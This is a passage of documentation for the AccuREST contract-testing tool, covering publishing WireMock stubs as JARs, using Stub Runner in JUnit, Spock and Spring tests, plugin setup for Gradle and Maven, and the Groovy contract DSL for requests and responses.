to the client side (or to various clients). Copying the JSON files manually is out of the question.\n\nIn this article you'll see how to prepare your project to start publishing stubs as JARs and how to use Stub Runner in your tests to run WireMock servers and feed them with stub definitions.\n\n## Publishing stubs as JARs\n\nThe easiest approach would be to centralize the way stubs are kept. For example, you can keep them as JARs in a Maven repository.\n\n### Gradle\n\nExample of an AccuREST Gradle setup:\n\n[source,groovy,indent=0]\n----\n\tapply plugin: 'maven-publish'\n\n\text {\n\t\twiremockStubsOutputDirRoot = \"${project.buildDir}\/production\/${project.name}-stubs\/\"\n\t\twiremockStubsOutputDir = new File(wiremockStubsOutputDirRoot)\n\t}\n\n\taccurest {\n\t\ttargetFramework = 'Spock'\n\t\ttestMode = 'MockMvc'\n\t\tbaseClassForTests = 'com.toomuchcoding.MvcSpec'\n\t\tcontractsDslDir = file(\"${project.projectDir.absolutePath}\/mappings\/\")\n\t\tgeneratedTestSourcesDir = file(\"${project.buildDir}\/generated-sources\/\")\n\t\tstubsOutputDir = wiremockStubsOutputDir\n\t}\n\n\ttask stubsJar(type: Jar, dependsOn: [\"generateWireMockClientStubs\"]) {\n\t baseName = \"${project.name}-stubs\"\n\t from wiremockStubsOutputDirRoot\n\t}\n\n\tartifacts {\n\t archives stubsJar\n\t}\n\n\tpublishing {\n\t publications {\n\t stubs(MavenPublication) {\n\t artifactId \"${project.name}-stubs\"\n\t artifact stubsJar\n\t }\n\t }\n\t}\n----\n\n### Maven\n\nAn example for Maven can be found in the https:\/\/github.com\/Codearte\/accurest-maven-plugin\/#publishing-wiremock-stubs-projectf-stubsjar[AccuREST Maven Plugin README].\n
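\nOne possible way to produce such a `stubs`-classified artifact with plain Maven is the standard `maven-jar-plugin`, packaging the directory the stubs are generated into (a sketch assuming the `target\/mappings` location described earlier; this is not the official setup from the README):\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-jar-plugin<\/artifactId>\n <executions>\n <execution>\n <id>stubs-jar<\/id>\n <phase>package<\/phase>\n <goals>\n <goal>jar<\/goal>\n <\/goals>\n <configuration>\n <classifier>stubs<\/classifier>\n <classesDirectory>${project.build.directory}\/mappings<\/classesDirectory>\n <\/configuration>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n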
\n## Using Stub Runner to automate running stubs\n\nStub Runner automates downloading stubs from a Maven repository (that includes also the local Maven repository) and starting the WireMock server for each of those stubs.\n\n### Modules\n\nAccuREST comes with a new structure of modules\n\n[source,indent=0]\n----\n\u2514\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner-junit\n \u251c\u2500\u2500 stub-runner-spring\n \u2514\u2500\u2500 stub-runner-spring-cloud\n----\n\n#### Stub Runner\n\nContains the core logic of Stub Runner. It gives you a main class to run Stub Runner from the command line or from Gradle.\n\nHere you can see a list of options with which you can run Stub Runner:\n\n[source,indent=0]\n----\njava -jar stub-runner.jar [options...]\n -maxp (--maxPort) N : Maximum port value to be assigned to the\n Wiremock instance. Defaults to 15000\n (default: 15000)\n -minp (--minPort) N : Minimal port value to be assigned to the\n Wiremock instance. Defaults to 10000\n (default: 10000)\n -s (--stubs) VAL : Comma separated list of Ivy representation of\n jars with stubs. Eg. groupid:artifactid1,group\n id2:artifactid2:classifier\n -sr (--stubRepositoryRoot) VAL : Location of a Jar containing server where you\n keep your stubs (e.g. http:\/\/nexus.net\/content\n \/repositories\/repository)\n -ss (--stubsSuffix) VAL : Suffix for the jar containing stubs (e.g.\n 'stubs' if the stub jar would have a 'stubs'\n classifier for stubs: foobar-stubs ).\n Defaults to 'stubs' (default: stubs)\n -wo (--workOffline) : Switch to work offline. Defaults to 'false'\n (default: false)\n----\n\nYou can either produce a fat-jar and run the app as presented above.\n\nYou can also configure the stub runner by either passing the full arguments list with `-Pargs` like this:\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pargs=\"-c pl -minp 10000 -maxp 10005 -s a:b:c,d:e,f:g:h\"`\n\nor each parameter separately, with a `-P` prefix and without the hyphen (-) in the name of the param:\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pc=pl -Pminp=10000 -Pmaxp=10005 -Ps=a:b:c,d:e,f:g:h`\n
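\nA direct fat-jar invocation could look like this (a sketch using only the flags documented above; the repository URL and stub coordinates are hypothetical):\n\n[source,shell]\n----\njava -jar stub-runner.jar -sr http:\/\/nexus.example.com\/content\/repositories\/releases \\\\\n -s io.codearte.accurest.stubs:loanIssuance,io.codearte.accurest.stubs:fraudDetectionServer \\\\\n -minp 12000 -maxp 12500\n----\n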
\n#### Stub Runner JUnit Rule\n\nStub Runner comes with a JUnit rule thanks to which you can very easily download and run stubs for a given group and artifact id:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n .downloadStub(\"io.codearte:stub1\", \"io.codearte:stub2:classifier\", \"io.codearte:stub3\");\n----\n\nAfter that rule is executed, Stub Runner connects to your Maven repository and for the given list of dependencies tries to:\n\n* download them\n* cache them locally\n* unzip them to a temporary folder\n* start a WireMock server for each Maven dependency on a random port from the provided range of ports\n* feed the WireMock server with all JSON files that are valid WireMock definitions\n\nStub Runner uses the http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html[Groovy Grape] mechanism to download the Maven dependencies. Check the http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html[docs] for more information.\n\nSince `AccurestRule` implements the `StubFinder` interface, it allows you to find the started stubs:\n\n[source,groovy,indent=0]\n----\ninterface StubFinder {\n\t\/**\n\t * For the given groupId and artifactId tries to find the matching\n\t * URL of the running stub.\n\t *\n\t * @param groupId - might be null. In that case a search only via artifactId takes place\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String groupId, String artifactId)\n\n\t\/**\n\t * For the given Ivy notation {@code groupId:artifactId} tries to find the matching\n\t * URL of the running stub. 
You can also pass only {@code artifactId}.\n\t *\n\t * @param ivyNotation - Ivy representation of the Maven artifact\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String ivyNotation)\n\n\t\/**\n\t * Returns all running stubs\n\t *\/\n\tRunningStubs findAllRunningStubs()\n}\n----\n\nExample of usage in Spock tests:\n\n[source,groovy,indent=0]\n----\n@ClassRule @Shared AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot('http:\/\/your.repo.com')\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') == rule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\trule.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${rule.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${rule.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n----\n\nExample of usage in JUnit tests:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\");\n\n\t@Test\n\tpublic void should_start_wiremock_servers() throws Exception {\n\t\t\/\/ expect: 'WireMocks are running'\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isEqualTo(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\"));\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isNotNull();\n\t\t\/\/ and:\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"loanIssuance\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs\", \"fraudDetectionServer\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isTrue();\n\t\t\/\/ and: 'Stubs were registered'\n\t\t\tthen(httpGet(rule.findStubUrl(\"loanIssuance\").toString() + \"\/name\")).isEqualTo(\"loanIssuance\");\n\t\t\tthen(httpGet(rule.findStubUrl(\"fraudDetectionServer\").toString() + \"\/name\")).isEqualTo(\"fraudDetectionServer\");\n\t}\n----\n\nCheck the *Common properties for JUnit and Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring\n\nIf you're using Spring then you can just import the `io.codearte.accurest.stubrunner.spring.StubRunnerConfiguration` and a bean of type `StubFinder` will get registered.\n\nIn order to find a URL and port of a given dependency you can autowire the bean in your test and call its methods:\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(classes = Config, loader = SpringApplicationContextLoader)\nclass 
StubRunnerConfigurationSpec extends Specification {\n\n\t@Autowired StubFinder stubFinder\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') == stubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\tstubFinder.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${stubFinder.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${stubFinder.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n\n\t@Configuration\n\t@Import(StubRunnerConfiguration)\n\t@EnableAutoConfiguration\n\tstatic class Config {}\n}\n----\n\nCheck the *Common properties for JUnit and Spring* section for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring Cloud\n\nIf you're using Spring Cloud then it's enough to add `stub-runner-spring-cloud` on the classpath, and a bean of type `StubFinder` will automatically get registered.\n\n#### Common properties for JUnit and Spring\n\nProperties that are repetitive can be set using system properties or property sources (for Spring). Here are their names with their default values:\n\n[width=\"60%\",frame=\"topbot\",options=\"header\"]\n|======================\n|Property name |Default value |Description\n|stubrunner.port.range.min |10000 |Minimal value of a port for a started WireMock with stubs\n|stubrunner.port.range.max |15000 |Maximal value of a port for a started WireMock with stubs\n|stubrunner.stubs.repository.root | |Maven repo URL. If blank then will use the local maven repo\n|stubrunner.stubs.classifier |stubs |Default classifier for the stub artifacts\n|stubrunner.work-offline |false |If true then will not contact any remote repositories to download stubs\n|stubrunner.stubs | |Comma separated list of Ivy notation of stubs to download\n|======================\n
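\nFor example, when using the Spring configuration these could be provided from a test `application.properties` (a sketch; the repository URL and stub coordinates are hypothetical):\n\n[source,properties,indent=0]\n----\nstubrunner.stubs.repository.root=http:\/\/nexus.example.com\/content\/repositories\/releases\nstubrunner.port.range.min=12000\nstubrunner.port.range.max=12500\nstubrunner.stubs=io.codearte.accurest.stubs:loanIssuance,io.codearte.accurest.stubs:fraudDetectionServer\n----\n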
\n# 9. Migration Guide\n\n## Migration to 0.4.7\n\n- in 0.4.7 we fixed the package name (coderate to codearte), so you have to do the same in your projects. This means replacing `io.coderate.accurest.dsl.GroovyDsl` with `io.codearte.accurest.dsl.GroovyDsl`\n\n## Migration to 1.0.0-RC1\n\n- from 1.0.0 we distinguish ignored contracts from excluded contracts:\n - the `excludedFiles` pattern tells Accurest to skip processing those files at all\n - the `ignoredFiles` pattern tells Accurest to generate contracts and tests, but the tests will be marked as `@Ignore`\n\n- from 1.0.0 the `basePackageForTests` behaviour has changed\n - prior to the change, all DSL files had to be under `contractsDslDir`\/`basePackageForTests`\/*subpackage*, resulting in the creation of the `basePackageForTests`.*subpackage* test package\n - now all DSL files have to be under `contractsDslDir`\/*subpackage*, resulting in the creation of the `basePackageForTests`.*subpackage* test package\n - if you don't migrate to the new approach you will have your tests under `contractsDslDir`.`contractsDslDir`.*subpackage*
Of course the higher the better :)\n\n## Add gradle plugin\n\n[source,groovy,indent=0]\n----\nbuildscript {\n\trepositories {\n\t\tmavenCentral()\n\t}\n\tdependencies {\n\t\tclasspath 'io.codearte.accurest:accurest-gradle-plugin:0.9.9'\n\t}\n}\n\napply plugin: 'accurest'\n\ndependencies {\n\ttestCompile 'org.spockframework:spock-core:1.0-groovy-2.4'\n testCompile 'com.github.tomakehurst:wiremock:2.0.4-beta' \/\/ you have to use WireMock with 2.0 versions of JsonPath\n\ttestCompile 'com.jayway.restassured:rest-assured:2.4.1'\n\ttestCompile 'com.jayway.restassured:spring-mock-mvc:2.4.1' \/\/ needed if you're going to use Spring MockMvc\n}\n----\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal> \/\/ for JUnit tests, use generateSpecs for Spock Specification\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest is looking for stubs in src\/test\/resources\/stubs directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\nsrc\/test\/resources\/stubs\/myservice\/shouldCreateUser.groovy\nsrc\/test\/resources\/stubs\/myservice\/shouldReturnUser.groovy\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - shouldCreateUser()\n - shouldReturnUser()\n\n## Run plugin\n\nPlugin registers itself to be invoked before `compileTestGroovy` task. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateAccurest` task.\n\n## Configure plugin\n\nTo change default configuration just add `accurest` snippet to your Gradle config\n\n[source,groovy,indent=0]\n----\naccurest {\n\ttestMode = 'MockMvc'\n\tbaseClassForTests = 'org.mycompany.tests'\n\tgeneratedTestSourcesDir = project.file('src\/accurest')\n}\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default MockMvc which is based on Spring's MockMvc. It can also be changed to **JaxRsClient** or to **Explicit** for real HTTP calls.\n - **imports** - array with imports that should be included in generated tests (for example ['org.myorg.Matchers']). By default empty array []\n - **staticImports** - array with static imports that should be included in generated tests(for example ['org.myorg.Matchers.*']). By default empty array []\n - **basePackageForTests** - specifies base package for all generated tests. By default set to io.codearte.accurest.tests\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **ignoredFiles** - Ant matcher allowing defining stub files for which processing should be skipped. By default empty array []\n - **contractsDslDir** - directory containing contracts written using the GroovyDSL. 
By default `$rootDir\/src\/test\/accurest`\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `$buildDir\/generated-test-sources\/accurest`\n - **stubsOutputDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed\n - **targetFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke:\n`.\/gradlew generateAccurest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in src\/test\/resources\/stubs and generate Wiremock json stubs using: `.\/gradlew generateWireMockClientStubs` command. Note that `stubsOutputDir` option has to be set for stub generation to work.\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 2.2. 
Using in your Maven project\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest is looking for stubs in `src\/test\/accurest` directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\n[source,groovy,indent=0]\n----\nsrc\/test\/accurest\/myservice\/shouldCreateUser.groovy\nsrc\/test\/accurest\/myservice\/shouldReturnUser.groovy\n----\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - `shouldCreateUser()`\n - `shouldReturnUser()`\n\n## Run plugin\n\nPlugin goal `generateTests` is assigned to be invoked in phase `generate-test-sources`. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateTests` goal.\n\n## Configure plugin\n\nTo change default configuration just add `configuration` section to plugin definition or `execution` definition.\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <configuration>\n <basePackageForTests>com.ofg.twitter.place<\/basePackageForTests>\n <baseClassForTests>com.ofg.twitter.place.BaseMockMvcSpec<\/baseClassForTests>\n <\/configuration>\n<\/plugin>\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default `MockMvc` which is based on Spring's MockMvc. It can also be changed to `JaxRsClient` or to `Explicit` for real HTTP calls.\n - **basePackageForTests** - specifies base package for all generated tests. By default set to `io.codearte.accurest.tests`.\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`.\n - **contractsDir** - directory containing contracts written using the GroovyDSL. By default `\/src\/test\/accurest`.\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `target\/generated-test-sources\/accurest`.\n - **mappingsDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed.\n - **testFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. 
## Base class for tests

When using Accurest in the default MockMvc mode you need to create a base specification for all generated acceptance tests. In this class you need to point to the endpoint which should be verified.

[source,groovy,indent=0]
----
package org.mycompany.tests

import org.mycompany.ExampleSpringController
import com.jayway.restassured.module.mockmvc.RestAssuredMockMvc
import spock.lang.Specification

class MvcSpec extends Specification {
    def setup() {
        RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())
    }
}
----

When using `Explicit` mode, you can use the base class to initialize the whole tested application, just as in regular integration tests. When using `JAXRSCLIENT` mode, the base class should also contain a `protected WebTarget webTarget` field; right now the only way to test a JAX-RS API is to start a web server.

## Invoking generated tests

The Accurest Maven Plugin generates the verification code into the `/generated-test-sources/accurest` directory and attaches this directory to the `testCompile` goal.

For Groovy Spock code use:

[source,xml,indent=0]
----
<plugin>
    <groupId>org.codehaus.gmavenplus</groupId>
    <artifactId>gmavenplus-plugin</artifactId>
    <version>1.5</version>
    <executions>
        <execution>
            <goals>
                <goal>testCompile</goal>
            </goals>
        </execution>
    </executions>
    <configuration>
        <testSources>
            <testSource>
                <directory>${project.basedir}/src/test/groovy</directory>
                <includes>
                    <include>**/*.groovy</include>
                </includes>
            </testSource>
            <testSource>
                <directory>${project.build.directory}/generated-test-sources/accurest</directory>
                <includes>
                    <include>**/*.groovy</include>
                </includes>
            </testSource>
        </testSources>
    </configuration>
</plugin>
----

To ensure that the provider side is compliant with the defined contracts, you need to invoke `mvn generateTests test`.

## Accurest on consumer side

In the consumer service you need to configure the Accurest plugin in exactly the same way as on the provider side. You need to copy the contracts stored in `src/test/accurest` and generate the WireMock JSON stubs using the `mvn generateStubs` command. By default the generated WireMock mappings are stored in the `target/mappings` directory.
From these generated mappings, your project should create an additional artifact with the `stubs` classifier for easy deployment to a Maven repository.

Sample configuration:

[source,xml,indent=0]
----
<plugin>
    <groupId>io.codearte.accurest</groupId>
    <artifactId>accurest-maven-plugin</artifactId>
    <version>${accurest.version}</version>
    <executions>
        <execution>
            <goals>
                <goal>convert</goal>
                <goal>generateStubs</goal>
            </goals>
        </execution>
    </executions>
</plugin>
----

Once generated, the JSON stubs can be used in automated consumer tests.

[source,groovy,indent=0]
----
@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)
class LoanApplicationServiceSpec extends Specification {

    @ClassRule
    @Shared
    WireMockClassRule wireMockRule = new WireMockClassRule()

    @Autowired
    LoanApplicationService sut

    def 'should successfully apply for loan'() {
        given:
            LoanApplication application =
                    new LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)
        when:
            LoanApplicationResult loanApplication = sut.loanApplication(application)
        then:
            loanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED
            loanApplication.rejectionReason == null
    }
}
----

Under the hood, LoanApplicationService makes a call to the FraudDetection service. This request is handled by a WireMock server configured with the stubs generated by Accurest.

# 3. Contract DSL

The Contract DSL in AccuREST is written in Groovy, but don't be alarmed if you haven't used Groovy before. Knowledge of the language is not really needed, as our DSL uses only a tiny subset of it (namely literals, method calls and closures). What's more, AccuREST's DSL is designed to be programmer-readable without any knowledge of the DSL itself.

Let's look at a full example of a contract definition.

[source,groovy,indent=0]
----
io.codearte.accurest.dsl.GroovyDsl.make {
    request {
        method 'POST'
        urlPath('/users') {
            queryParameters {
                parameter 'limit': 100
                parameter 'offset': containing("1")
                parameter 'filter': "email"
            }
        }
        headers {
            header 'Content-Type': 'application/json'
        }
        body '''{ "login" : "john", "name": "John The Contract" }'''
    }
    response {
        status 200
        headers {
            header 'Location': '/users/john'
        }
    }
}
----

Not all features of the DSL are used in the example above. If you didn't find what you are looking for, please check the next paragraphs on this page.

> You can easily compile Accurest contracts to WireMock stub mappings using the standalone Maven command: `mvn io.codearte.accurest:accurest-maven-plugin:convert`.

## Top-Level Elements

The following methods can be called in the top-level closure of a contract definition. Request and response are mandatory; priority is optional.

[source,groovy,indent=0]
----
io.codearte.accurest.dsl.GroovyDsl.make {
    // Definition of the HTTP request part of the contract
    // (this can be a valid request or an invalid one, depending
    // on the type of contract being specified).
    request {
        ...
    }

    // Definition of the HTTP response part of the contract
    // (a service implementing this contract should respond
    // with the following response after receiving the request
    // specified in the "request" part above).
    response {
        ...
    }

    // Contract priority, which can be used for overriding
    // contracts (1 is highest). Priority is optional.
    priority 1
}
----
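To illustrate `priority`, here is a hedged sketch of a catch-all contract (the endpoint is borrowed from a later example on this page): given another contract for the same endpoint declared with `priority 1`, the contract below loses, because 1 is the highest priority.

[source,groovy,indent=0]
----
io.codearte.accurest.dsl.GroovyDsl.make {
    // 2 is a lower priority than 1, so a contract for the same
    // endpoint declared with `priority 1` wins over this one
    priority 2
    request {
        method 'POST'
        url '/users/password'
    }
    response {
        status 404
    }
}
----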
## Request

The HTTP protocol requires only a **method and an address** to be specified in a request. The same information is mandatory in the request definition of an AccuREST contract.

[source,groovy,indent=0]
----
io.codearte.accurest.dsl.GroovyDsl.make {
    request {
        // HTTP request method (GET/POST/PUT/DELETE).
        method 'GET'

        // Path component of the request URL is specified as follows.
        urlPath('/users')
    }

    response {
        ...
    }
}
----

It is possible to specify the whole `url` instead of just the path, but `urlPath` is the recommended way, as it makes the tests **host-independent**.

[source,groovy,indent=0]
----
io.codearte.accurest.dsl.GroovyDsl.make {
    request {
        method 'GET'

        // Specifying `url` and `urlPath` in one contract is illegal.
        url('http://localhost:8888/users')
    }

    response {
        ...
    }
}
----

A request may contain **query parameters**, which are specified in a closure nested in a call to `urlPath` or `url`.

[source,groovy,indent=0]
----
io.codearte.accurest.dsl.GroovyDsl.make {
    request {
        ...

        urlPath('/users') {

            // Each parameter is specified in the form
            // `'paramName' : paramValue` where the parameter value
            // may be a simple literal or one of the matcher functions,
            // all of which are used in this example.
            queryParameters {

                // If a simple literal is used as the value,
                // the default matcher function is used (equalTo).
                parameter 'limit': 100

                // The `equalTo` function simply compares the passed value
                // using the identity operator (==).
                parameter 'filter': equalTo("email")

                // The `containing` function matches strings
                // that contain the passed substring.
                parameter 'gender': containing("[mf]")

                // The `matching` function tests the parameter
                // against the passed regular expression.
                parameter 'offset': matching("[0-9]+")

                // The `notMatching` function tests whether the parameter
                // does not match the passed regular expression.
                parameter 'loginStartsWith': notMatching(".{0,2}")
            }
        }

        ...
    }

    response {
        ...
    }
}
----

It may contain additional **request headers**...

[source,groovy,indent=0]
----
io.codearte.accurest.dsl.GroovyDsl.make {
    request {
        ...

        // Each header is added in the form `'Header-Name' : 'Header-Value'`.
        headers {
            header 'Content-Type': 'application/json'
        }

        ...
    }

    response {
        ...
    }
}
----

...and a **request body**.

[source,groovy,indent=0]
----
io.codearte.accurest.dsl.GroovyDsl.make {
    request {
        ...

        // JSON and XML formats of the request body are supported.
        // The format will be determined from a header or the body's content.
        body '''{ "login" : "john", "name": "John The Contract" }'''
    }

    response {
        ...
    }
}
----

The **body's format** can also be specified explicitly, by invoking one of the format functions.

[source,groovy,indent=0]
----
io.codearte.accurest.dsl.GroovyDsl.make {
    request {
        ...

        // In this case the body will be treated as XML.
        body equalToXml(
                '''<user><login>john</login><name>John The Contract</name></user>'''
        )
    }

    response {
        ...
    }
}
----

## Response

A minimal response must contain an **HTTP status code**.

[source,groovy,indent=0]
----
io.codearte.accurest.dsl.GroovyDsl.make {
    request {
        ...
    }
    response {
        // Status code sent by the server
        // in response to the request specified above.
        status 200
    }
}
----

Besides the status, a response may contain **headers** and a **body**, which are specified the same way as in the request (see the previous paragraph).
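Putting the two together, here is a small sketch of a contract whose response carries both a header and a JSON body (the values reuse the earlier examples):

[source,groovy,indent=0]
----
io.codearte.accurest.dsl.GroovyDsl.make {
    request {
        method 'GET'
        urlPath('/users/john')
    }
    response {
        status 200
        // headers and body on the response side use exactly
        // the same syntax as on the request side
        headers {
            header 'Content-Type': 'application/json'
        }
        body '''{ "login" : "john", "name" : "John The Contract" }'''
    }
}
----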
## Regular expressions

You can use regular expressions to write your requests in the Contract DSL. This is particularly useful when you want to indicate that a given response should be provided for requests that follow a given pattern. It also helps when you need patterns rather than exact values, both for your client-side and your server-side tests.

Please see the example below:

[source,groovy,indent=0]
----
io.codearte.accurest.dsl.GroovyDsl groovyDsl = GroovyDsl.make {
    request {
        method('GET')
        url $(client(~/\/[0-9]{2}/), server('/12'))
    }
    response {
        status 200
        body(
                id: value(
                        client('123'),
                        server(regex('[0-9]+'))
                ),
                surname: $(
                        client('Kowalsky'),
                        server('Lewandowski')
                ),
                name: 'Jan',
                created: $(client('2014-02-02 12:23:43'), server({ currentDate(it) })),
                correlationId: value(client('5d1f9fef-e0dc-4f3d-a7e4-72d2220dd827'),
